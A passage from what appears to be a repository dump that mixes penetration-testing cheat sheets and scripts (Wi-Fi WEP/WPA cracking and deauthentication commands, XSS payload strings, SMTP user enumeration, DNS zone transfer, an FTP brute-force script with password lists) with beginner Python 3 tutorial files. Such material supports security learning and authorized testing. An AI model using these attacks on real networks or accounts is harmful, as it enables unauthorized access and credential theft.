--script-args='target=www.example.com' 44 | 45 | Alternatives: 46 | - Set VM's default gateway as the victim IP address and attempt to route elsewhere. 47 | - http://pentestmonkey.net/tools/gateway-finder 48 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_WindowsCommandLine.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Penentration Testing_Scripts/Cheatsheets/Cheatsheet_WindowsCommandLine.pdf -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_WirelessTesting.txt: -------------------------------------------------------------------------------- 1 | WEP attack with aircrack-ng suite. 2 | ---------------------------------- 3 | 4 | airmon-ng start wlan0 5 | airodump-ng -c --bssid -w wlan0mon 6 | aireplay-ng -1 0 -e -a -h wlan0mon 7 | aireplay-ng -3 -b -h wlan0mon # ARP Replay 8 | aireplay-ng -0 1 -a -c wlan0mon 9 | aircrack-ng -0 10 | 11 | airmon-ng start wlan0 12 | airodump-ng -c --bssid -w wlan0mon 13 | aireplay-ng -1 0 -e -a -h wlan0mon 14 | aireplay-ng -5 -b -h wlan0mon 15 | packetforge-ng -0 -a -h -l -k -y -w 16 | tcpdump -n -vvv -e -s0 -r 17 | aireplay-ng -2 -r wlan0mon 18 | aircrack-ng -0 19 | 20 | 21 | WPA PSK attack with aircrack-ng suite. 22 | -------------------------------------- 23 | 24 | airmon-ng start wlan0 25 | airodump-ng -c --bssid -w wlan0mon 26 | aireplay-ng -0 1 -a -c wlan0mon 27 | aircrack-ng -0 -w 28 | 29 | You can capture the handshake passively (it takes time) or de-authenticate a client. 
30 | 31 | De-authentication attack 32 | aireplay-ng --deauth 3 -a -c mon0 33 | 34 | Deauth every client - aireplay-ng -0 5 -a mon0 35 | 36 | Dictionary Attack 37 | aircrack-ng -w passwords.lst capture-01.cap 38 | 39 | Brute force Attack 40 | crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap 41 | 42 | CoWPAtty Attack 43 | Wordlist mode: 44 | cowpatty -r -f -2 -s 45 | 46 | PMK mode: 47 | genpmk -f -d -s 48 | cowpatty -r -d -2 -s 49 | 50 | Rogue Access Point Testing 51 | -------------------------- 52 | 53 | # ifconfig wlan0 down 54 | # iw reg set BO 55 | # iwconfig wlan0 txpower 0 56 | # ifconfig wlan0 up 57 | # airmon-ng start wlan0 58 | # airodump-ng --write capture mon0 59 | 60 | ifconfig wlan1 down 61 | iw reg set BO 62 | ifconfig wlan1 up 63 | iwconfig wlan1 channel 13 64 | iwconfig wlan1 txpower 30 65 | iwconfig wlan1 rate 11M auto 66 | 67 | 68 | Reaver 69 | ------ 70 | 71 | airmon-ng start wlan0 72 | airodump-ng wlan0 73 | reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv 74 | reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1 75 | 76 | 77 | Pixie WPS 78 | --------- 79 | 80 | airmon-ng check 81 | airmon-ng start wlan0 82 | airodump-ng wlan0mon --wps 83 | reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1 84 | 85 | 86 | Wireless Notes 87 | -------------- 88 | 89 | Wired Equivalent Privacy (WEP) 90 | RC4 stream cipher w/ CRC32 for integrity check 91 | - Attack: 92 | By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs. 93 | - Remediation: 94 | Use WPA2 95 | 96 | Wifi Protected Access (WPA) 97 | Temporal Key Integrity Protocol (TKIP) Message Integrity Check 98 | - Attack: 99 | Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. 
100 | - Remediation: 101 | Use long keys (a long, random passphrase) 102 | 103 | Wifi Protected Access 2 (WPA2) 104 | Advanced Encryption Standard (AES) 105 | - Attack: 106 | Uses a four way handshake, and if that handshake can be captured, then a dictionary attack can be mounted to find the Pairwise Master Key for the Access Point and client Station. 107 | - Remediation: 108 | WPA-Enterprise 109 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_XSS.txt: -------------------------------------------------------------------------------- 1 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; 2 | alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- 3 | >">'> 4 | 5 | 6 | 7 | 8 | xxs link 9 | xxs link 10 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_scp.txt: -------------------------------------------------------------------------------- 1 | [+] Secure Copy (scp) Cheatsheet 2 | -------------------------------- 3 | 4 | [>] Copy remote file to local host: 5 | 6 | $ scp your_username@192.168.0.10: /some/local/directory 7 | 8 | [>] Copy local file to remote host: 9 | 10 | $ scp your_username@192.168.0.10:/some/remote/directory 11 | 12 | [>] Copy local directory to remote directory: 13 | 14 | scp -r your_username@192.168.0.10:/some/remote/directory/ 15 | 16 | [>] Copy a file from one remote host to another: 17 | 18 | scp your_username@:/some/remote/directory/foobar.txt your_username@:/some/remote/directory/ 19 | 20 | [>] Improve scp performance (use blowfish): 21 | Note: blowfish is a legacy 64-bit-block cipher that recent OpenSSH releases have removed; where it is rejected, pick an AES cipher such as aes128-ctr instead. 22 | scp -c blowfish your_username@192.168.0.10:/some/remote/directory -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/README.md: -------------------------------------------------------------------------------- 1 | Cheatsheets 2 | 
=========== 3 | 4 | Penetration Testing/Security Cheatsheets that I have collated over the years. 5 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/DNS_lookup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$1" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid file" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | echo "" 11 | echo "[*] These addresses were found based on $1" 12 | echo "" 13 | 14 | for IP in $(cat $1);do 15 | 16 | host $IP | grep "domain name" | cut -d " " -f5 > temp.txt 17 | info=`cat temp.txt` 18 | echo "$IP" " " "$info" 19 | rm temp.txt 20 | done 21 | 22 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/SMTP_VRFY.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$2" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid URL" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | 11 | 12 | for user in $(cat $2);do 13 | echo VRFY $user | nc -nv -w 1 $1 25 2>/dev/null|grep ^"250" 14 | done 15 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/dns_zone_transfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$1" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid URL" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | echo "" 11 | echo "[*] The following addresses were found" 12 | echo "" 13 | 14 | for server in $(host -t ns $1|cut -d" " -f4);do 15 | host -l $1 $server |grep "has address" | cut -d " " -f1,4; 16 | 17 | done 18 | 19 | 20 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/forward_DNS.sh: 
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$1" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid URL" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | echo "" 11 | echo "[*] These addresses were found based on list.txt" 12 | echo "" 13 | 14 | for name in $(cat list.txt);do 15 | host $name.$1 | grep "has address" | cut -d" " -f1,4 | sort -u 16 | done 17 | 18 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/list.txt: -------------------------------------------------------------------------------- 1 | www 2 | ftp 3 | mail 4 | admin 5 | router 6 | www2 7 | firewall 8 | mx 9 | pop3 10 | smtp 11 | root 12 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/nmap_spam.sh: -------------------------------------------------------------------------------- 1 | #/bin/bash 2 | 3 | 4 | if (-z $1); then 5 | echo "" 6 | echo "[*] Please enter a base ip" 7 | echo "" 8 | exit 0 9 | fi 10 | echo "" 11 | echo "[*] Scan Results" 12 | echo "" 13 | 14 | for ip in $(seq 0 254);do 15 | nmap -sS $1.$ip -o Nmap/output$ip.txt & 16 | done 17 | 18 | nmap -sT $1.255 19 | 20 | for ip in $(seq 0 254);do 21 | cat Nmap/output$ip.txt >> output.txt 22 | rm Nmap/output$ip.txt 23 | done 24 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/ping_sweep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$1" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid base IP" 6 | echo "" 7 | exit 0 8 | fi 9 | 10 | echo "" 11 | echo "[*] Listing live IPs" 12 | echo "" 13 | 14 | for ip in $(seq 0 254); do 15 | ping -c 1 $1.$ip | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 >> sweep.txt& 16 | 17 | done 18 | 19 | # Printing from text file for clean output 
20 | cat sweep.txt 21 | rm sweep.txt 22 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/reverse_DNS.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$4" ]; then 4 | echo "" 5 | echo "[*] Please enter a valid input" 6 | echo "[*] Correct format: 'IP base' 'Domain' 'Range Start' 'Range End'" 7 | echo "[*] Example: 127.0.0 google 1 255" 8 | echo "" 9 | exit 0 10 | fi 11 | 12 | echo "" 13 | echo "[*] Listing found addresses" 14 | echo "" 15 | 16 | for ip in $(seq $3 $4);do 17 | host $1.$ip | grep $2 | cut -d" " -f1,5 18 | done 19 | 20 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Pentest_Tools/vrfy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) != 3: 7 | print "[*] Usage: vrfy.py " 8 | sys.exit(0) 9 | 10 | else: 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | connect = s.connect((sys.argv[1], 25)) #connets to socket 13 | banner = s.recv(1024) 14 | print banner #prints banner 15 | f1 = open('./'+ sys.argv[2], 'r')#reads input file 16 | f2 = open('./user_results.txt', 'w+') #opens files for writing 17 | 18 | for ln in iter(f1.readline, ''): #runs the VRFY chack and outputs it to a file 19 | s.send('VRFY ' + ln +'\r\n') 20 | result = s.recv(1024) 21 | f2.writelines(result) 22 | print result 23 | 24 | s.close() 25 | 26 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/ftp_brute_force/ftp_brute_force.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Researcher" 3 | 4 | import ftplib 5 | import sys 6 | 7 | def 
brute(ip,users_file,passwords_file): 8 | try: 9 | ud=open(users_file,"r") 10 | pd=open(passwords_file,"r") 11 | 12 | users= ud.readlines() 13 | passwords=pd.readlines() 14 | 15 | for user in users: 16 | for password in passwords: 17 | try: 18 | print "[*] Trying to connect" 19 | connect=ftplib.FTP(ip) 20 | response=connect.login(user,password) 21 | print response 22 | if "230 Login" in response: 23 | print "[*]Sucessful attack" 24 | print "User: "+ user + "Password: "+password 25 | sys.exit() 26 | else: 27 | pass 28 | except ftplib.error_perm: 29 | print "Cant Brute Force with user "+user+ "and password "+password 30 | connect.close 31 | 32 | except(KeyboardInterrupt): 33 | print "Interrupted!" 34 | sys.exit() 35 | 36 | ip=raw_input("Introduce IP:") 37 | user_file="users.txt" 38 | passwords_file="passwords.txt" 39 | brute(ip,user_file,passwords_file) 40 | 41 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/ftp_brute_force/passwords.txt: -------------------------------------------------------------------------------- 1 | admin 2 | usuario 3 | user -------------------------------------------------------------------------------- /Penentration Testing_Scripts/ftp_brute_force/requirements.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/ftp_brute_force/users.txt: -------------------------------------------------------------------------------- 1 | usuario 2 | admin 3 | user 4 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/conditionals.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | a, b = 0, 1 5 | if a < b: 6 | print('a ({}) is less than b ({})'.format(a, b)) 7 | else: 8 | print('a 
({}) is not less than b ({})'.format(a, b)) 9 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/exceptions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | fh = open('xlines.txt') 5 | for line in fh.readlines(): 6 | print(line) 7 | 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/forloop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | # read the lines from the file 4 | fh = open('lines.txt') 5 | for line in fh.readlines(): 6 | print(line) 7 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/function.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def isprime(n): 5 | if n == 1: 6 | print("1 is special") 7 | return False 8 | for x in range(2, n): 9 | if n % x == 0: 10 | print("{} equals {} x {}".format(n, x, n // x)) 11 | return False 12 | else: 13 | print(n, "is a prime number") 14 | return True 15 | 16 | for n in range(1, 20): 17 | isprime(n) 18 | 19 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | def isprime(n): 4 | if n == 1: 5 | return False 6 | for x in range(2, n): 7 | if n % x == 0: 8 | return False 9 | else: 10 | return True 11 | 12 | def primes(n = 1): 13 | while(True): 14 | if isprime(n): yield n 15 | n += 1 16 | 17 | for n in primes(): 18 | if n > 100: break 19 | print(n) 20 | 21 | 
-------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/hello.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | print("Hello, World!") 4 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/lines.txt: -------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/oop2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | class AnimalActions: 4 | def quack(self): return self.strings['quack'] 5 | def feathers(self): return self.strings['feathers'] 6 | def bark(self): return self.strings['bark'] 7 | def fur(self): return self.strings['fur'] 8 | 9 | class Duck(AnimalActions): 10 | strings = dict( 11 | quack = "Quaaaaak!", 12 | feathers = "The duck has gray and white feathers.", 13 | bark = "The duck cannot bark.", 14 | fur = "The duck has no fur." 15 | ) 16 | 17 | class Person(AnimalActions): 18 | strings = dict( 19 | quack = "The person imitates a duck.", 20 | feathers = "The person takes a feather from the ground and shows it.", 21 | bark = "The person says woof!", 22 | fur = "The person puts on a fur coat." 23 | ) 24 | 25 | class Dog(AnimalActions): 26 | strings = dict( 27 | quack = "The dog cannot quack.", 28 | feathers = "The dog has no feathers.", 29 | bark = "Arf!", 30 | fur = "The dog has white fur with black spots." 
31 | ) 32 | 33 | def in_the_doghouse(dog): 34 | print(dog.bark()) 35 | print(dog.fur()) 36 | 37 | def in_the_forest(duck): 38 | print(duck.quack()) 39 | print(duck.feathers()) 40 | 41 | def main(): 42 | donald = Duck() 43 | john = Person() 44 | fido = Dog() 45 | 46 | print("- In the forest:") 47 | for o in ( donald, john, fido ): 48 | in_the_forest(o) 49 | 50 | print("- In the doghouse:") 51 | for o in ( donald, john, fido ): 52 | in_the_doghouse(o) 53 | 54 | if __name__ == "__main__": main() 55 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/oop3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | # -- VIEW -- 4 | 5 | class AnimalActions: 6 | def bark(self): return self._doAction('bark') 7 | def fur(self): return self._doAction('fur') 8 | def quack(self): return self._doAction('quack') 9 | def feathers(self): return self._doAction('feathers') 10 | 11 | def _doAction(self, action): 12 | if action in self.strings: 13 | return self.strings[action] 14 | else: 15 | return 'The {} has no {}'.format(self.animalName(), action) 16 | 17 | def animalName(self): 18 | return self.__class__.__name__.lower() 19 | 20 | # -- MODEL -- 21 | 22 | class Duck(AnimalActions): 23 | strings = dict( 24 | quack = "Quaaaaak!", 25 | feathers = "The duck has gray and white feathers." 26 | ) 27 | 28 | class Person(AnimalActions): 29 | strings = dict( 30 | bark = "The person says woof!", 31 | fur = "The person puts on a fur coat.", 32 | quack = "The person imitates a duck.", 33 | feathers = "The person takes a feather from the ground and shows it." 
34 | ) 35 | 36 | class Dog(AnimalActions): 37 | strings = dict( 38 | bark = "Arf!", 39 | fur = "The dog has white fur with black spots.", 40 | ) 41 | 42 | # -- CONTROLLER -- 43 | 44 | def in_the_doghouse(dog): 45 | print(dog.bark()) 46 | print(dog.fur()) 47 | 48 | def in_the_forest(duck): 49 | print(duck.quack()) 50 | print(duck.feathers()) 51 | 52 | def main(): 53 | donald = Duck() 54 | john = Person() 55 | fido = Dog() 56 | 57 | print("-- In the forest:") 58 | for o in ( donald, john, fido ): 59 | in_the_forest(o) 60 | 61 | print("-- In the doghouse:") 62 | for o in ( donald, john, fido ): 63 | in_the_doghouse(o) 64 | 65 | if __name__ == "__main__": main() 66 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/simpleoop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | # simple fibonacci series 4 | # the sum of two elements defines the next set 5 | class Fibonacci(): 6 | def __init__(self, a, b): 7 | self.a = a 8 | self.b = b 9 | 10 | def series(self): 11 | while(True): 12 | yield(self.b) 13 | self.a, self.b = self.b, self.a + self.b 14 | 15 | f = Fibonacci(0, 1) 16 | for r in f.series(): 17 | if r > 100: break 18 | print(r, end=' ') 19 | 20 | -------------------------------------------------------------------------------- /Python_3_Tutorials/02 Quick Start/whileloop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | # simple fibonacci series 4 | # the sum of two elements defines the next set 5 | a, b = 0, 1 6 | while b < 50: 7 | print(b) 8 | a, b = b, a + b 9 | -------------------------------------------------------------------------------- /Python_3_Tutorials/04 Syntax/comments.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = 
"Santhosh Baswa" 3 | 4 | def main(): 5 | for n in primes(): 6 | if n > 100: break 7 | print(n) 8 | 9 | def isprime(n): 10 | if n == 1: 11 | return False 12 | for x in range(2, n): 13 | if n % x == 0: 14 | return False 15 | else: 16 | return True 17 | 18 | def primes(n = 1): 19 | while(True): 20 | if isprime(n): yield n 21 | n += 1 22 | 23 | if __name__ == "__main__": main() 24 | -------------------------------------------------------------------------------- /Python_3_Tutorials/04 Syntax/syntax.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the syntax.py file.") 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/05 Variables/variables.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the variables.py file.") 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/06 Conditionals/conditionals.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the conditionals.py file.") 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/06 Conditionals/jumptable.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | class jumptable(): 5 | jumptable = {} 6 | 7 | def set(self, k, v): 8 | self.jumptable[k] = v 9 | 10 | def go(self, index): 11 | if index in self.jumptable: 12 | self.jumptable[index]() 13 | elif 'default' in 
self.jumptable: 14 | self.jumptable['default']() 15 | else: 16 | raise RuntimeError('undefined jump: {}'.format(index)) 17 | 18 | def main(): 19 | j = jumptable(); 20 | j.set('one', one) 21 | j.set('two', two) 22 | j.set('three', three) 23 | j.set('default', default) 24 | 25 | try: 26 | j.go('seven') 27 | except RuntimeError as e: 28 | print(e) 29 | 30 | def one(): 31 | print('This is the "one" function.') 32 | 33 | def two(): 34 | print('This is the "two" function.') 35 | 36 | def three(): 37 | print('This is the "three" function.') 38 | 39 | def default(): 40 | print('this is the default function.') 41 | 42 | if __name__ == "__main__": main() 43 | -------------------------------------------------------------------------------- /Python_3_Tutorials/06 Conditionals/switch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print('this is the switch.py file') 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/for.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | fh = open('lines.txt') 6 | for line in fh.readlines(): 7 | print(line) 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/iterators.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | fh = open('lines.txt') 6 | for line in fh.readlines(): 7 | print(line) 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/lines.txt: 
-------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/loopcontrol.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | s = 'this is a string' 6 | for c in s: 7 | print(c, end='') 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/07 Loops/while.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | # simple fibonacci series 6 | # the sum of two elements defines the next set 7 | a, b = 0, 1 8 | while b < 50: 9 | print(b, end=' ') 10 | a, b = b, a + b 11 | 12 | if __name__ == "__main__": main() 13 | -------------------------------------------------------------------------------- /Python_3_Tutorials/08 Operators/ops.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the ops.py file.") 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/09 Regexes/regex.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import re 5 | 6 | def main(): 7 | fh = open('raven.txt') 8 | for line in fh: 9 | if re.search('(Len|Neverm)ore', line): 10 | print(line, end='') 11 | 12 | if __name__ == "__main__": main() 13 | 
-------------------------------------------------------------------------------- /Python_3_Tutorials/10 Exceptions/exceptions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | fh = open('lines.txt') 6 | for line in fh: print(line.strip()) 7 | 8 | if __name__ == "__main__": main() 9 | -------------------------------------------------------------------------------- /Python_3_Tutorials/10 Exceptions/lines.txt: -------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/11 Functions/functions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | testfunc() 6 | 7 | def testfunc(): 8 | print('This is a test function') 9 | 10 | if __name__ == "__main__": main() 11 | -------------------------------------------------------------------------------- /Python_3_Tutorials/11 Functions/generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print("This is the functions.py file.") 6 | for i in range(25): 7 | print(i, end = ' ') 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/12 Classes/classes.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | class Duck: 5 | def quack(self): 6 | print('Quaaack!') 7 | 8 | def walk(self): 9 | print('Walks like a duck.') 10 | 11 | def main(): 
12 | donald = Duck() 13 | donald.quack() 14 | donald.walk() 15 | 16 | if __name__ == "__main__": main() 17 | -------------------------------------------------------------------------------- /Python_3_Tutorials/12 Classes/decorators.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | class Duck: 5 | def __init__(self, **kwargs): 6 | self.properties = kwargs 7 | 8 | def quack(self): 9 | print('Quaaack!') 10 | 11 | def walk(self): 12 | print('Walks like a duck.') 13 | 14 | def get_properties(self): 15 | return self.properties 16 | 17 | def get_property(self, key): 18 | return self.properties.get(key, None) 19 | 20 | def main(): 21 | donald = Duck(color = 'blue') 22 | print(donald.get_property('color')) 23 | 24 | if __name__ == "__main__": main() 25 | -------------------------------------------------------------------------------- /Python_3_Tutorials/12 Classes/generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | o = range(25) 6 | for i in o: print(i, end = ' ') 7 | 8 | if __name__ == "__main__": main() 9 | -------------------------------------------------------------------------------- /Python_3_Tutorials/13 Strings/lines.txt: -------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/13 Strings/strings.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | s = 'this is a string' 6 | print(s.capitalize()) 7 | print(s.title()) 8 | print(s.upper()) 9 | print(s.swapcase()) 
10 | print(s.find('is')) 11 | print(s.replace('this', 'that')) 12 | print(s.strip()) 13 | print(s.isalnum()) 14 | print(s.isalpha()) 15 | print(s.isdigit()) 16 | print(s.isprintable()) 17 | 18 | if __name__ == "__main__": main() 19 | -------------------------------------------------------------------------------- /Python_3_Tutorials/14 Containers/containers.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | print('This is the containers.py file.') 6 | 7 | if __name__ == "__main__": main() 8 | -------------------------------------------------------------------------------- /Python_3_Tutorials/14 Containers/utf8.txt: -------------------------------------------------------------------------------- 1 | This is a UTF-8 file. 2 | It has some interesting characters in it. 3 | ٩(͡๏̯͡๏)۶ 4 | -------------------------------------------------------------------------------- /Python_3_Tutorials/15 Files/files.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | def main(): 5 | f = open('lines.txt') 6 | for line in f: 7 | print(line, end = '') 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/15 Files/lines.txt: -------------------------------------------------------------------------------- 1 | 01 This is a line of text 2 | 02 This is a line of text 3 | 03 This is a line of text 4 | 04 This is a line of text 5 | 05 This is a line of text 6 | -------------------------------------------------------------------------------- /Python_3_Tutorials/15 Files/olives.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Python_3_Tutorials/15 
Files/olives.jpg -------------------------------------------------------------------------------- /Python_3_Tutorials/16 Databases/databases.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import sqlite3 5 | 6 | def main(): 7 | print('This is the databases.py file') 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/16 Databases/sqlite3-class.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import sqlite3 5 | 6 | class database: 7 | def __init__(self, **kwargs): 8 | self.filename = kwargs.get('filename') 9 | self.table = kwargs.get('table', 'test') 10 | 11 | def sql_do(self, sql, *params): 12 | self._db.execute(sql, params) 13 | self._db.commit() 14 | 15 | def insert(self, row): 16 | self._db.execute('insert into {} (t1, i1) values (?, ?)'.format(self._table), (row['t1'], row['i1'])) 17 | self._db.commit() 18 | 19 | def retrieve(self, key): 20 | cursor = self._db.execute('select * from {} where t1 = ?'.format(self._table), (key,)) 21 | return dict(cursor.fetchone()) 22 | 23 | def update(self, row): 24 | self._db.execute( 25 | 'update {} set 